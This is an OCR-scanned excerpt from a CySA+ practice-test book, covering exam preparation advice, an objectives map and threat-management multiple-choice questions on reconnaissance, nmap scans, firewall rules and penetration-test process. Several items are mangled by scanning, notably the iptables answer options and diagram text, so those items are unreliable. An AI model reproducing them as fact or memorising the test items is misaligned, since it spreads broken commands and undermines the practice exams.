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Introduction 


CompTIA CySA+ (Cybersecurity Analyst) Practice Tests is a companion volume to the 
CompTIA CySA+ (Cybersecurity Analyst) Study Guide (Wiley, 2017, Chapple/Seidl). If 
you're looking to test your knowledge before you take the CySA+ exam, this book will 

help you by providing a combination of 1,000 questions that cover the CySA+ domains and 
easy-to-understand explanations of both right and wrong answers. 

If you’re just starting to prepare for the CySA+ exam, we highly recommend that you 
use the Cybersecurity Analyst+ (CySA+) Study Guide to help you learn about each of 
the domains covered by the CySA+ exam. Once you’re ready to test your knowledge, use 
this book to help find places where you may need to study more or to practice for the 
exam itself. 

Since this is a companion to the CySA+ Study Guide, this book is designed to be similar 
to taking the CySA+ exam. It contains multipart scenarios as well as standard multiple- 
choice questions similar to those you may encounter in the certification exam itself. 

The book itself is broken up into 6 chapters: 4 domain-centric chapters with more than 
200 questions about each domain, and 2 chapters that contain 85-question practice tests 
to simulate taking the exam itself. 


CompTIA 


CompTIA is a nonprofit trade organization that offers certification in a variety of IT areas, 
ranging from the skills that a PC support technical needs, which are covered in the A+ 
exam, to advanced certifications like the CompTIA Advanced Security Practitioner (CASP) 
certification. CompTIA divides its exams into four different categories based on the skill 
level required for the exam and what topics it covers, as shown here: 


Foundational Professional Specialty Mastery 
IT Fundamentals Å+ CDIA+ CASP 

Cloud+ with Virtualization CTT+ 

CySA+ Cloud Essentials 

Linux+ Healthcare IT Tech 

Mobility+ 

Network+ 

Security+ 

Project+ 


Server+ 
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CompTIA recommends that practitioners follow the cybersecurity career path shown 
here: 


CompTIA 
IT 
Fundamentals 


CompTIA CompTIA CompTIA CompTIA CompTIA 


A+ Network+ Security+ CySA+ CASP 





As you can see, the Cybersecurity Analyst+ certification fits into the Professional 
category, which is the same place you’ll find the popular A+, Network+, and Security+ 
credentials. Don’t let this fool you, however. The Cybersecurity Analyst+ exam is a more 
advanced exam, intended for professionals with hands-on experience and who possess the 
knowledge covered by the prior exams. 

CompTIA certifications are ISO and ANSI accredited, and they are used throughout 
multiple industries as a measure of technical skill and knowledge. In addition, CompTIA 
certifications, including the Security+ and the CASP, have been approved by the U.S. 
government as information assurance baseline certifications and are included in the State 
Department’s Skills Incentive Program. 


The Cybersecurity Analyst+ Exam 


The Cybersecurity Analyst+ exam, which CompTIA refers to as the CySA+, is designed to 
be a vendor-neutral certification for cybersecurity, threat, and vulnerability analysts. The 
CySA+ certification is designed for security analysts and engineers as well as security opera- 
tions center (SOC) staff, vulnerability analysts, and threat intelligence analysts. It focuses 
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on security analytics and practical use of security tools in real-world scenarios. It covers 
four major domains: Threat Management, Vulnerability Management, Cyber Incident 
Response, and Security Architecture and Tool Sets. These four areas include a range of 
topics, from reconnaissance to incident response and forensics, while focusing heavily on 
scenario-based learning. 

The CySA+ exam fits between the entry-level Security+ exam and the CompTIA 
Advanced Security Practitioner (CASP) certification, providing a mid-career certification 
for those who are seeking the next step in their certification and career path. 

The CySA+ exam is conducted in a format that CompTIA calls “performance-based 
assessment.” This means the exam uses hands-on simulations using actual security tools 
and scenarios to perform tasks that match those found in the daily work of a security prac- 
titioner. Exam questions may include multiple types of questions such as multiple-choice, 
fill-in-the-blank, multiple-response, drag-and-drop, and image-based problems. 

CompTIA recommends that test takers have three to four years of information 
security-related experience before taking this exam. The exam costs $320 in the United 
States, with roughly equivalent prices in other locations around the globe. You can find 
more details about the CySA+ exam and how to take it at https://certification 
.comptia.org/certifications/cybersecurity-analyst. 


Study and Exam Preparation Tips 


We recommend you use this book in conjunction with the Cybersecurity Analyst+ (CySA+) 
Study Guide. Read through chapters in the study guide and then try your hand at the prac- 
tice questions associated with each domain in this book. 

You should also keep in mind that the CySA+ certification is designed to test practical 
experience, so you should also make sure that you get some hands-on time with the secu- 
rity tools covered on the exam. CompTIA recommends the use of NetWars-style simula- 
tions, penetration testing and defensive cybersecurity simulations, and incident response 
training to prepare for the CySA+. 

Additional resources for hands-on exercises include the following: 


=  Exploit-Exercises.com provides virtual machines, documentation, and challenges 
covering a wide range of security issues at https: //exploit-exercises.com/. 


=  Hacking-Lab provides Capture the Flag (CTF) exercises in a variety of fields at 
https: //www.hacking-lab.com/index. html. 


= The OWASP Hacking Lab provides excellent web application focused exercises at 
https: //www.owasp.org/index.php/OWASP_Hacking_Lab. 


=  PentesterLab provides a subscription based access to penetration testing exercises at 
https: //www.pentesterlab.com/exercises/. 


= The InfoSec Institute provides online capture-the-flag activities with bounties for 
written explanations of successful hacks at http: //ctf.infosecinstitute.com/. 
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Since the exam uses scenario-based learning, expect the questions to involve analysis 
and thought, rather than relying on simple memorization. The questions in this book are 
intended to help you be confident that you know the topic well enough to think through 
hands-on exercises. 


Taking the Exam 


Once you are fully prepared to take the exam, you can visit the CompTIA website to pur- 
chase your exam voucher: 


www.comptiastore.com/Articles.asp?ID=265&category=vouchers 


CompTIA partners with Pearson VUE’s testing centers, so your next step will be to 
locate a testing center near you. In the United States, you can do this based on your address 
or your ZIP code, while non-U.S. test takers may find it easier to enter their city and coun- 
try. You can search for a test center near you at the Pearson Vue website, where you will 
need to navigate to “Find a test center”: 


www. pearsonvue.com/comptia/ 


Now that you know where you’d like to take the exam, simply set up a Pearson VUE 
testing account and schedule an exam: 


https: //certification.comptia.org/testing/schedule-exam 


On the day of the test, bring two forms of identification, and make sure to show up 
with plenty of time before the exam starts. Remember that you will not be able to take 
your notes, electronic devices (including smartphones and watches), or other materials in 
with you. 


After the Cybersecurity Analyst+ Exam 


Once you have taken the exam, you will be notified of your score immediately, so you’ll 
know if you passed the test right away. You should keep track of your score report with 
your exam registration records and the email address you used to register for the exam. 


Maintaining Your Certification 


CompTIA certifications must be renewed on a periodic basis. To renew your certification, 
you can either pass the most current version of the exam, earn a qualifying higher-level 
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CompTIA or industry certification, or complete sufficient continuing education activities to 
earn enough continuing education units (CEUs) to renew it. 
CompTIA provides information on renewals via their website at: 


https://certification.comptia.org/continuing-education/how-to-renew 


When you sign up to renew your certification, you will be asked to agree to the CE pro- 
gram’s Code of Ethics, to pay a renewal fee, and to submit the materials required for your 
chosen renewal method. 

You can find a full list of the industry certifications you can use to acquire CEUs toward 
renewing the CySA+: 


https: //certification.comptia.org/continuing-education/renewothers/ 
renewing-cysa 


Using This Book to Practice 


This book is composed of six chapters. Each of the first four chapters covers a domain, 
with a variety of questions that can help you test your knowledge of real-world, scenario, 
and best practices—based security knowledge. The final two chapters are complete practice 
exams that can serve as timed practice tests to help determine whether you’re ready for the 
CySA+ exam. 

We recommend taking the first practice exam to help identify where you may need to 
spend more study time and then using the domain-specific chapters to test your domain 
knowledge where it is weak. Once you’re ready, take the second practice exam to make sure 
you’ve covered all the material and are ready to attempt the CySA+ exam. 

As you work through questions in this book, you will encounter tools and technology 
that you may not be familiar with. If you find that you are facing a consistent gap or that 
a domain is particularly challenging, we recommend spending some time with books and 
materials that tackle that domain in depth. This can help you fill in gaps and help you be 
more prepared for the exam. 
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Objectives Map for CompTIA CySA+ 
(Cybersecurity Analyst) Exam CS0-001 


The following objective map for the CompTIA CySA+ (Cybersecurity Analyst) certification 
exam will enable you to find where each objective is covered in the book. 


Objectives Map 


Objective Chapter 


1.0 Threat Management 


1.1 Given a scenario, apply environmental reconnaissance techniques using Chapter 1 
appropriate tools and processes. 


Procedures/common tasks including Topology discovery, OS fingerprinting, 
Service discovery, Packet capture, Log review, Router/firewall ACLs review, 
Email harvesting, Social media profiling, Social engineering, DNS harvesting, 
Phishing; Variables including Wireless vs. wired, virtual vs. physical, internal 
vs. external, and on-premises vs. cloud; Tools including NMAP, Host scanning, 
Network mapping, netstat, packet analyzers, IDS/IPS, HIDS/NIDS, Firewall 
rule-based and logs, Syslog, Vulnerability scanners 


1.2 Given a scenario, analyze the results of a network reconnaissance. Chapter 1 


Point-in-time data analysis including Packet analysis, Protocol analysis, Traffic 
analysis, Netflow analysis, Wireless analysis; Data correlation and analytics 
including Anomaly analysis, Trend analysis, Availability analysis, Heuristic 
analysis, Behavioral analysis; Data output including Firewall logs, Packet 
captures, NMAP scan results, Event logs, Syslogs, IDS reports; Tools including 
SIEM, Packet analyzers, IDS/IPS, Resource monitoring tools, Netflow analyzer 


1.3 Given a network-based threat, implement or recommend the appropriate Chapter 1 
response and countermeasure. 


Network segmentation, system isolation, jump boxes and bastion hosts, 
Honeypots and honeynets, Endpoint security, Group policies, ACLs, Sinkholes, 
Hardening, Mandatory Access Control (MAC), Compensating controls, Blocking 
unused ports/services, Patching, Network Access Control (NAC) policies 
including time-based, rule-based, role-based, and location-based 
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Objective Chapter 
1.4 Explain the purpose of practices used to secure a corporate environment. Chapter 1 


Penetration testing, Rules of engagement: timing, scope. Authorization, 
exploitation, communication, and reporting. Reverse engineering, lsolation/ 
sandboxing, Hardware concerns including source authenticity of hardware, 
trusted foundry, and OEM documentation. Software/malware, Fingerprinting/ 
hashing, Decomposition, Training and exercises, Red teams, Blue teams, and 
White teams. Risk evaluation, Technical control review, Operational control 
review, Technical impact and likelihood and rating: High, Medium, and Low 


2.0 Vulnerability Management 


2.1 Given a scenario, implement an information security vulnerability Chapter 2 
management process. 


Identification of requirements, Regulatory environments, Corporate policy, 
Data classification, Asset inventory including critical and non-critical 

assets. Establishing scanning frequency based on risk appetite, regulatory 
requirements, technical constraints, and workflow. Configure tools to perform 
scans according to specification, Determining scanning criteria, setting 
sensitivity levels, vulnerability feeds, scan scope, credentialed vs. non- 
credentialed, types of data, and server-based vs. agent-based scanning. Tool 
updates/plug-ins, SCAP, Permissions and access, How to execute scanning and 
generate reports, Automated vs. manual distribution, remediation, prioritizing 
response based on criticality and difficulty of implementation. Communication/ 
change control, Sandboxing/testing, Inhibitors to remediation: MOUs, SLAs, 
organizational governance, business process interruption, and degrading 
functionality. Ongoing scanning and continuous monitoring 


2.2 Given a scenario, analyze the output resulting from a vulnerability scan. Chapter 2 


Analyze reports from a vulnerability scan, Review and interpret scan results, 
Identify false positives, Identify exceptions, Prioritize response actions, 
Validate results and correlate other data points, Compare to best practices or 
compliance, Reconcile results, Review related logs and/or other data sources, 
Determine trends 


2.3 Compare and contrast common vulnerabilities found in the following Chapter 2 
targets within an organization. 


Servers, Endpoints, Network infrastructure, Network appliances, Virtual 
infrastructure, Virtual hosts, Virtual networks, Management interfaces, Mobile 
devices, Interconnected networks, Virtual private networks (VPNs), Industrial 
Control Systems (ICSs), SCADA devices 
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Objective Chapter 


3.0 Cyber Incident Response 


3.1 Given a scenario, distinguish threat data or behavior to determine the Chapter 3 
impact of an incident 


Threat classification: known threats vs. unknown threats, Zero day, and 
advanced persistent threats. Factors contributing to incident severity and 
prioritization: scope of impact, downtime, recovery time. data integrity, 
economic impact, system process criticality. Types of data: Personally 
Identifiable Information (PII), Personal Health Information (PHI), payment card 
information, intellectual property, corporate confidential, accounting data. 
mergers and acquisitions 


3.2 Given a scenario, prepare a toolkit and use appropriate forensics tools Chapter 3 
during an investigation. 


Forensics kits, Digital forensics workstations, Write blockers, Cables, Drive 
adapters, Wiped removable media, Cameras, o Crime tape, Tamper-proof seals, 
Documentation/forms, Chain of custody forms, Incident response plan, Incident 
forms, Call list/escalation lists. Forensic investigation suites, Imaging utilities, 
Analysis utilities, Chain of custody, Hashing utilities, OS and process analysis, 
Mobile device forensics, Password crackers, Cryptography tools, Log viewers 


3.3 Explain the importance of communication during the incident response Chapter 3 
process. 


Stakeholders: HR, legal, marketing, and management. Purpose of 
communication processes: Limiting communication to trusted parties, 
disclosure based on regulatory/legislative requirements, o Preventing 
inadvertent release of information, secure method of communication. Role- 
based responsibilities: technical, management, law enforcement, and retaining 
an incident response provider 


3.4 Given a scenario, analyze common symptoms to select the best course of Chapter 3 
action to support incident response. 


Common network-related symptoms: bandwidth consumption, beaconing, 
irregular peer-to-peer communication, rogue devices on the network, scan 
sweeps, and unusual traffic spikes. Common host-related symptoms: processor 
(CPU) consumption, memory consumption, drive capacity consumption, 
unauthorized software, malicious processes, unauthorized changes, 
unauthorized privileges, data exfiltration. Common application-related 
symptoms: anomalous activity, introduction of new accounts, unexpected 
output, unexpected outbound communication, service interruption, memory 
overflows 
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Objective 
3.5 Summarize the incident recovery and post-incident response process. 


Containment techniques: segmentation, isolation, removal, and reverse 
engineering. Eradication techniques: sanitization, reconstruction/reimage, 
secure disposal, validation, patching, permissions, scanning, and verifying 
logging/communication to security monitoring. Corrective actions, Lessons 
learned reports, Change control process, Updating incident response plans, 
Incident summary reports 


4.0 Security Architecture and Tool Sets 


4.1 Explain the relationship between frameworks, common policies, controls, 
and procedures. 


Regulatory compliance, Frameworks: NIST, ISO, COBIT, SABSA, TOGAF, 

ITIL. Policies: password policy, acceptable use policy, data ownership policy, 
data retention policy, account management policy, and data classification 
policies. Controls, Control selection based on criteria, Organizationally 
defined parameters, Physical controls, Logical controls, Administrative 
controls, Procedures: continuous monitoring, evidence production, patching, 
compensating control development, control testing procedures, managing 
exceptions, developing and executing remediation plans. Verifications 

and quality control, Audits, Evaluations, Assessments, Maturity models, 
Certification 


4.2 Given a scenario, use data to recommend remediation of security issues 
related to identity and access management. 


Security issues associated with context-based authentication based on time, 
location, frequency, behavioral patterns. Security issues associated with 
identities: personnel, endpoints, servers, services, roles, applications. Security 
issues associated with identity repositories, Directory services, TACACS+, 
RADIUS, Security issues associated with federation and single sign-on: o 
Manual vs. automatic provisioning/deprovisioning and self-service password 
reset. Exploits: impersonation, man-in-the-middle attacks, session hijacking, 
cross-site scripting, privilege escalation, and rootkits. 


4.3 Given a scenario, review security architecture and make recommendations 
to implement compensating controls. 


Security data analytics using data aggregation and correlation, trend analysis, 
and historical analysis. Manual review of firewall logs, syslogs, authentication 
logs, and event logs. Defense in depth concepts. Personnel security: training, 
dual control, separation of duties, third party/consultants, cross training, 
mandatory vacation, succession planning. Defense in depth related processes: 
continual improvement, scheduled reviews, and retirement of processes. 
Technologies: automated reporting, security appliances. security suites, 
outsourcing, Security as a Service (SaaS), and cryptography. Other security 
concepts: network design and network segmentation 
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Chapter 3 


Chapter 4 


Chapter 4 


Chapter 4 
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Objective Chapter 


4.4 Given a scenario, use application security best practices while participating Chapter 4 
in the Software Development Life Cycle (SDLC). 


Best practices during software development, Security requirements definition, 
Security testing phases, Static code analysis, Web app vulnerability scanning, 
Fuzzing, Use of interception proxies to crawl applications, Manual peer reviews, 
User acceptance testing, Stress testing applications, Security regression 
testing, Input validation, Secure coding best practices from OWASP, SANS, 
Center for Internet Security. System design recommendations and benchmarks 


4.5 Compare and contrast the general purpose and reasons for using various Chapter 4 
cybersecurity tools and technologies. 


Preventative tools, including IPS: Sourcefire, Snort, Bro, HIPS, Firewalls: Cisco, 
Palo Alto, Check Point. Antivirus and Anti-malware, EMET, Web proxies, Web 
Application Firewall (WAF) systems: ModSecurity, NAXSI, Imperva. 


Collective tools, including SIEMs: ArcSight, ORadar, Splunk, AlienVault, OSSIM, 
Kiwi Syslog. Network scanning tool with NMAP, Vulnerability scanning using 
Qualys, Nessus, OpenVAS, Nexpose, Nikto, and the Microsoft Baseline Security 
Analyzer. o Packet capture using Wireshark, tcpdump, Network General, 

and Aircrack-ng. Command line/IP utilities: netstat, ping, tracert/traceroute, 
ipconfig/ifconfig, nslookup/dig, the Sysinternals suite, OpenSSL. IDS/HIDS: Bro. 


Analytical tools, including Vulnerability scanning including Qualys, Nessus, 
OpenVAS, Nexpose, Nikto, and the Microsoft Baseline Security Analyzer. 
Monitoring tools: MRTG, Nagios, SolarWinds, Cacti, NetFlow Analyzer. 
Interception proxies: Burp Suite, Zap, and Vega. 


Exploit tools, including Interception proxies: Burp Suite, Zap, and Vega. o 
Exploit framework: Metasploit and Nexpose. Fuzzers: Untidy, Peach Fuzzer, 
Microsoft SDL File/Regex Fuzzer. 


Forensics tools, including Forensic suites: EnCase, FTK, Helix, Sysinternals, and 
Cellebrite. Hashing tools: MD5sum, SHAsum. Password cracking tools; John 
the Ripper, Cain & Abel. Imaging using DD 
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Management 





EXAM OBJECTIVES COVERED IN THIS 
CHAPTER: 


Y/Y 1.1 Given a scenario, apply environmental reconnais- 
sance techniques using appropriate tools and processes. 


=» Procedures/common tasks 
a Variables 


= Tools 


/ 1.2 Given a scenario, analyze the results of a network 
reconnaissance. 


= Point-in-time data analysis 
=» Data correlation and analytics 
=» Data output 


= Tools 


Y 1.3 Given a network-based threat, implement or recom- 
mend the appropriate response and countermeasure. 


=» Network segmentation 
=» Honeypot 

=» Endpoint security 

= Group policies 

=» ACLs 

=» Hardening 


=» Network Access Control (NAC) 


Y/Y 1.4 Explain the purpose of practices used to secure a 
corporate environment. 


=» Penetration testing 
=» Reverse engineering 
=» Training and exercises 


a Risk evaluation 
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. Charles wants to use active discovery techniques as part of his reconnaissance efforts. 
Which of the following techniques fits his criteria? 


A. Google searching 

B. Using a Shodan search 

C. Using DNS reverse lookup 

D. Querying a PGP key server 

. During the reconnaissance stage of a penetration test, Cynthia needs to gather information 


about the target organization’s network infrastructure without causing an IPS to alert the 
target to her information gathering. Which of the following is her best option? 


A. Performa DNS brute-force attack. 

B. Usean nmap ping sweep. 

C. Perform a DNS zone transfer. 

D. Usean nmap stealth scan. 

. Tiffany needs to assess the patch level of a Windows 2012 server and wants to use a freely 


available tool to check the system for security issues. Which of the following tools will 
provide the most detail about specific patches installed or missing from her machine? 


A. nmap 
B. Nessus 
C. MBSA 


D. Metasploit 


. Charleen is preparing to conduct a scheduled reconnaissance effort against a client site. 
Which of the following is not typically part of the rules of engagement that are agreed to 
with a client for a reconnaissance effort? 


A. Timing 

B. Scope 

C. Exploitation methods 
D. Authorization 


. A port scan of a remote system shows that port 3306 is open on a remote database server. 
What database is the server most likely running? 


A. Oracle 
B. Postgres 
C. MySQL 


D. Microsoft SQL 

. Maria wants to deploy an anti-malware tool to detect zero-day malware. What type of 
detection method should she look for in her selected tool? 

A. Signature based 

B. Heuristic based 


C. Trend based 
D. Availability based 
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7. During a port scan of her network, Cynthia discovers a workstation that shows the follow- 
ing ports open. What should her next action be? 


Starting Nmap 7. 


25BETA2 ( https://nmap.org ) at 2017-05-25 21:08 EDT 


Nmap scan report for deptsrv (192.168.2.22) 
Host is up (0.00023s latency). 
Not shown: 65524 filtered ports 


PORT STATE 
80/tcp open 
135/tcp open 
139/tcp open 
445/tcp open 
3389/tcp open 
7680/tcp open 
49677/tcp open 
MAC Address: AD: 


Nmap done: 1 IP 


Run a vulnerability scan 
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SERVICE 

http 

msrpc 

netbios-ssn 

microsoft-ds 

ms -wbt-server 

unknown 

unknown 

5F:F4:7B:4B:7D (Intel Corporation) 


address (1 host up) scanned in 105.78 seconds 


Determine the reason for the ports being open. 


Investigate the potentially compromised workstation. 


to identify vulnerable services. 


Reenable the workstation’s local host firewall. 


8. Charles wants to provide additional security for his web application that currently stores 
passwords in plain text in a database. Which of the following options is his best option to 
prevent theft of the database from resulting in exposed passwords? 


A. Encrypt the database of plain-text passwords. 


B. Use MDS and a salt. 
C. Use SHA-1 and a salt. 
D. Use bcrypt. 


9. Cameron needs to set up a Linux iptables-based firewall ruleset to prevent access from 
hosts A and B, while allowing SMTP traffic from host C. Which set of the following 
commands will accomplish this? 


=p. 
Destination 
Host 


IP Address: 
192.168.2.11 


Host A 
IP Address: 
10.1.1.170 


E; 


Host B 
IP Address: 
10.2.0.134 


E; 





Host C 
IP Address: 
10.2.0.130 


E; 
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10. 


11. 


12. 
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A. # iptables -I INPUT 2 -s 
# iptables -I INPUT 2 -s 
# iptables -I INPUT 2 -s 
B. # iptables -I INPUT 2 -s 
# iptables -I INPUT 2 -s 
# iptables -I INPUT 2 -s 
C. # iptables -I INPUT 2 -s 
# iptables -I INPUT 2 -s 
# iptables -I INPUT 2 -s 
D. # iptables -I INPUT 2 -s 
# iptables -I INPUT 2 -s 
# iptables -I INPUT 2 -s 


10. 
10. 
10. 
10. 
10, 
10. 
10. 
10:3 
10. 
10; 
10; 
10. 
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1.170 -j DROP 

0.0/24 --dport 25 -j DROP 
0.130 --dport 25 -j ALLOW 
1.170 -j DROP 

0.0.134 -j DROP 

Oe 
1 
0 
0 
1 
0 
0 


130 --dport 25 -j ALLOW 


.170 -j ALLOW 
.0.134 -j ALLOW 
.130 --dport 25 -j DROP 


.170 -j DROP 
.0.134 -j DROP 
.130 -j ALLOW 


After filling out the scoping document for a penetration test, including details of what 
tools, techniques, and targets are included in the test, what is the next step that Jessica 


needs to take to conduct the test? 


A. 


Port scan the target systems. 


B. Get sign-off on the document. 
C. Begin passive fingerprinting. 
D. Notify local law enforcement. 


Brian’s penetration testing efforts have resulted in him successfully gaining access to a 
target system. Using the diagram shown here, identify what step occurs at point B in the 


NIST SP800-115 process flow. 


Gaining Access 


Vulnerability scanning 
Discovery 


Escalating privileges 
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Pivoting 





Install 
Additional Tools 


System 
Browsing 


Chris wants to prevent remote login attacks against the root account on a Linux system. 
What method will stop attacks like this while allowing normal users to use ssh? 


A. Add an iptables rule blocking root logins. 


B. Add root to the sudoers group. 


13. 


14. 


15. 
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C. Change sshd_config to deny root login. 
D. Add a network IPS rule to block root logins. 


What term is often used for attackers during a penetration test? 

A. Black team 

B. Blue team 

C. Redteam 

D. Green team 

Charles uses the following command while investigating a Windows workstation used by 
his organization’s vice president of finance who only works during normal business hours. 
Charles believes that the workstation has been used without permission by members of his 


organization’s cleaning staff after-hours. What does he know if the user ID shown is the 
only user ID able to log into the system, and he is investigating on August 12, 2017? 


C:\Users\bigfish>wmic netlogin get name, Lastlogon,badpasswordcount 
BadPasswordCount LastLogon Name 
NT AUTHORITY\SYSTEM 0 20170811203748 .000000-240 Finance\bigfish 


A. The account has been compromised. 

B. No logins have occurred. 

C. The last login was during business hours. 

D. Charles cannot make any determinations from this information. 

Lauren’s honeynet, shown here, is configured to use a segment of unused network space 


that has no legitimate servers in it. What type of threats is this design particularly useful 
for detecting? 


Border Router 


Firewall or 









Unified =~ 
Security Fo etl 
Device ae 





Honeynet 








Internal 
Trusted 
Zone 
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Zero-day attacks 
SQL injection 
Network scans 
DDoS attacks 
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Angela is designing her organization’s data center network and wants to establish a secure 
zone and a DMZ. If Angela wants to ensure that user accounts and traffic that manage 
systems in the DMZ are easily auditable and that all access can be logged while helping 
prevent negative impacts from compromised or infected workstations, which of the follow- 
ing solutions is Angela’s best design option? 


A. Administrative virtual machines run on administrator workstations 
B. A jump host 
C. A bastion host 


D. Use ssh or RDP from administrative workstations 


Fred believes that the malware he is tracking uses a fast flux DNS network, which associ- 
ates many IP addresses with a single fully qualified domain name as well as using multiple 


download hosts. How many distinct hosts should he review based on the netflow shown 
here? 


Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Packets Bytes Flows 
2017-07-11 14:39:30.606 0.448 TCP 192.168.2.1:1451->10.2.3.1:443 10 1510 1 
2017-07-11 14:39:30.826 0.448 TCP 10.2.3.1:443->192.168.2.1:1451 7 360 1 
2017-07-11 14:45:32.495 18.492 TCP 10.6.2.4:443->192.168.2.1:1496 5 1107 1 
2017-07-11 14:45:32.255 18.888 TCP 192.168.2.1:1496->10.6.2.4:443 11 1840 1 
2017-07-11 14:46:54.983 0.000 TCP 192.168.2.1:1496->10.6.2.4:443 1 49 1 
2008-12-09 16:45:34.764 0.362 TCP 10.6.2.4:443->192.168.2.1:4292 4 1392 1 
2008-12-09 16:45:37.516 0.676 TCP 192.168.2.1:4292->10.6.2.4:443 4 462 1 
2008-12-09 16:46:38.028 0.000 TCP 192.168.2.1:4292->10.6.2.4:443 2 89 1 
2017-07-11 14:45:23.811 0.454 TCP 192.168.2.1:1515->10.6.2.5:443 4 263 1 
2017-07-11 14:45:28.879 1.638 TCP 192.168.2.1:1505->10.6.2.5:443 18 2932 I 
2017-07-11 14:45:29.087 2.288 TCP 10.6.2.5:443->192.168.2.1:1505 31 48125 1 
2017-07-11 14:45:54.027 0.224 TCP 10.6.2.5:443->192.168.2.1:1515 2 1256 1 
2017-07-11 14:45:58.551 4.328 TCP 192.168.2.1:1525->10.6.2.5:443 10 648 1 
2017-07-11 14:45:58.759 0.920 TCP 10.6.2.5:443->192.168.2.1:1525 12 15792 1 
2017-07-11 14:46:32.227 14.796 TCP 192.168.2.1:1525->10.8.2.5:443 31 1700 1 
2017-07-11 14:46:52.983 0.000 TCP 192.168.2.1:1505->10.8.2.5:443 1 40 1 
A. 


na A OQ e 


B. 
C. 
D 


18. 


19. 


20. 


21. 


22. 


Chapter 1 = Domain 1: Threat Management 


Rick is auditing a Cisco router configuration and notes the following line: 
login block-for 120 attempt 5 with 60 


What type of setting has been enabled? 

A. A DDoS prevention setting 

B. A back-off setting 

C. A telnet security setting 

D. An autologin prevention setting 

As a U.S. government employee, Michael is required to ensure that the network devices 


that he procures have a verified chain of custody for every chip and component that goes 
into them. What is this program known as? 


A. Gray market procurement 

B. Trusted Foundry 

C. White market procurement 

D. Chain of Procurement 

During a network reconnaissance exercise, Chris gains access to a PC located in a secure 
network. If Chris wants to locate database and web servers that the company uses, what 


command-line tool can he use to gather information about other systems on the local net- 
work without installing additional tools or sending additional traffic? 


A. ping 

B. traceroute 
C. nmap 

D. netstat 


Alice is conducting a penetration test of a client’s systems. As part of her test, she gathers 
information from the social media feeds of staff members who work for her client. What 
phase of the NIST penetration testing process is she currently in? 


A. Social engineering 
B. Discovery 
C. Analysis 


D. Social media profiling 


What is the default nmap scan type when nmap is not provided with a scan type flag? 
A. A TCP FIN scan 

B. A TCP connect scan 

C. A TCP SYN scan 

D. A UDP scan 
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23. Isaac wants to grab the banner from a remote web server using commonly available tools. 
Which of the following tools cannot be used to grab the banner from the remote host? 


24. 


25. 


26. 


A. 
B. 
C. 
D. 


netcat 
telnet 
wget 
ftp 


Charles wants to limit what potential attackers can gather during passive or semipassive 
reconnaissance activities. Which of the following actions will typically reduce his organi- 
zation’s footprint the most? 


A. 
B. 
C. 
D. 


Limit information available via the organizational website without authentication. 
Use a secure domain registration. 
Limit technology references in job postings. 


Purge all document metadata before posting. 


Cassandra’s nmap scan of an open wireless network (192.168.10/24) shows the following 
host at IP address 192.168.1.1. Which of the following is most likely to be the type of sys- 
tem at that IP address based on the scan results shown? 
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PORT STATE SERVICE VERSION 


22/tcp open ssh Dropbear sshd 2016.74 (protocol 2.0) 
53/tcp open domain dnsmasq 2.76 
80/tcp open http Acme milli httpd 2.0 (ASUS RT-AC-series router) 


139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 

445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 

515/tcp open tcpwrapped 

1723/tcp open pptp linux (Firmware: 1) 

8200/tcp open upnp MiniDLNA 1.1.5 (0S: 378.xx; DLNADOC 1.50; UPnP 1.0) 
8443/tcp open ssl/http Acme milli_httpd 2.0 (ASUS RT-AC-series router) 
9100/tcp open jetdirect? 

9998/tcp open tcpwrapped 

Device type: bridge|general purpose 





A virtual machine 
A wireless router 
A broadband router 


A print server 


While reviewing Shodan scan data for his organization, John notices the following entry. 
Which of the following is false? 


10001 [Please try to use SSHv1 for your sessions to avoid transmitting passwords 
tcp in the clear over the net.] 


automated- 
tank-gauge console.transsys.com --- UNAUTHORIZED ACCESS PROHIBITED. GO AWAY. --- 





User Access Verification 


Username: 
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The device allows telnet connections. 
There is a console port on a nonstandard port. 


The device requires sshv1. 
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The device is an automated tank gauge. 


27. Lauren has local access to a Windows workstation and wants to gather information about 
the organization that it belongs to. What type of information can she gain if she executes 
the command nbtstat -c? 


A. MAC addresses and IP addresses of local systems 

B. NetBIOS name-to-IP address mappings 

C. A list of all NetBIOS systems that the host is connected to 
D. NetBIOS MAC-to-IP address mappings 


28. Tracy believes that a historic version of her target’s website may contain data she needs for 
her reconnaissance. What tool can she use to review snapshots of the website from mul- 
tiple points in time? 


A. Time Machine 
B. Morlock 
C. Wayback Machine 
D. Her target’s web cache 
29. After Kristen received a copy of an nmap scan run by a penetration tester that her company 


hired, she knows that the tester used the -0 flag. What type of information should she 
expect to see included in the output other than open ports? 


A. OCMP status 

B. Other ports 

C. Objective port assessment data in verbose mode 

D. Operating system and Common Platform Enumeration (CPE) data 


30. Andrea wants to conduct a passive footprinting exercise against a target company. Which 
of the following techniques is not suited to a passive footprinting process? 


A. WHOIS lookups 
B. Banner grabbing 
C. BGP looking glass usage 
D. Registrar checks 
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31. While gathering reconnaissance data for a penetration test, Charleen uses the MxToolbox 
MX Lookup tool. What can she determine from the response to her query shown here? 


32. 


Pref Hostname 


10 cluster1.us.messagelabs.com 


20 cluster1a.us.messagelabs.com 


Test 


DNS Record Published 


Your email service provider is “MessageLabs” 


A 
B. 
C 
D 


IP Address TTL 


216.82.241.131 

E New York US 
MessageLabs Inc. (AS26282) 
216.82.251.230 

Ms New York US 
MessageLabs Inc. (AS26282) 


15 min Blacklist Check 


15 min Blacklist Check 


Result 


DNS Record found 


Need Bulk Email Provider Data? 





The mail servers are blacklisted. 

The mail servers have failed an SMTP test. 
The mail servers are clustered. 

There are two MX hosts listed in DNS. 


SMTP Test 


SMTP Test 


Alex wants to scan a protected network and has gained access to a system that can com- 


municate to both his scanning system and the internal network, as shown in the image 
here. What type of nmap scan should Alex conduct to leverage this host if he cannot install 


nmap on system A? 


Eu 


A reflection scan 
A proxy scan 


A randomized host scan 
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A ping-through scan 
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33. Asa member of a blue team, John observed the following behavior during an external pen- 
etration test. What should he report to his managers at the conclusion of the test? 


34. 


35. 


999 > 


Network Latency & Packet Loss 


AMI (AWS) 
Apr 21 2017, 12:30 pm- Apr 22 2017, 12:30 pm 


Zoom lh 12h 24h 


INOS 


200 ms 1 


100 ms 5 
6:00 PM 22 Apr 6:00 AM 12:00 PM 


TIME IN MELLISECC 


JN 


ox # 
E 
OX O 





4 EB Response Time AMI (AWS) 
4 GB % Packet Loss AMI (AWS) 


solarwinds A 


A significant increase in latency 
A significant increase in packet loss 
